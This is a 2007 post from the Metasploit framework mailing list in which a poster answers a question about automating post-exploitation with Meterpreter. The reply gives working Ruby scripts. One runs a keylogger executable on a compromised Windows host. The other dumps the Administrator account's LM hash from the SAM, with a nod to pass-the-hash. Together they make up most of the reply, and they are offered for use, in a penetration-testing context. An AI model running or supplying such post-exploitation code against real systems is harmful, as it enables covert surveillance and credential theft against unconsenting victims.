[framework] Meterpreter AutoExec?

Jerome Athias jerome.athias at free.fr
Sat Nov 10 07:57:57 CST 2007 

Hi,

the design of the Meterpreter let you do this sort of things in an easy 
way: the meterpreter scripts! (thanks to The Alien ;-p)
look at /scripts/meterpreter/
you'll find the needed migrate.rb script

then, to launch a new process you'll use something like:

myproc = client.sys.process.execute("C:\\keylog.exe", "/S")
continue = false
while (continue == false)
    sleep 5
    pid_list = client.sys.process.processes().collect { |x| x["pid"] }
    if (pid_list.include?(myproc.pid) == false)
       continue = true
    end
end
print_status("Keylog installed")

to dump the LM hash of the Administrator account, use:

client.core.use("priv")
max = client.priv.sam_hashes.length - 1
for i in 0..max
    if client.priv.sam_hashes[i].user_id == "500"
       adm_name= client.priv.sam_hashes[i].user_name
       adm_lanman = client.priv.sam_hashes[i].lanman
    end
end
print_status("LM hash for " + adm_name +" is "+ adm_lanman)
# pass-the-hash anyone?

Then, ... just be creative & innovative!

My 2 euro cents
/JA
www.securinfos.info

Best regards to VV & the folks of MISC (don't forget about my website 
guys ;-))

CybyDude a écrit :
> Hi List!
>
> Does Meterpreter support some sorta AutoExec script that can be executed post 
> exploitation? I understand this sort of thing'd be possible through Ruby 
> Scripts using MSF/Meterpreter API. But does MSF specifically look for 
> something like autoexec (like AUTOEXEC.BAT in good old DOS)?
>
> Basically, I'm interested in automating post exploitation measures for client 
> side attacks, which may include:
>
> 1-Migration of Process to something safe before user terminates IE/OE/FF
> 2-Dump Hashes
> 3-Upload, deploy & init custom stuff like a key logger
> 4-Dash off a mail to the pentester about the vulnerable machine.
>
> Could some one pls guide me in this regard?
>
>
> Regards n' Best Wishes
> CybyDude
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3253 bytes
Desc: S/MIME Cryptographic Signature
Url : http://spool.metasploit.com/pipermail/framework/attachments/20071110/b15bffad/attachment.bin

More information about the framework mailing list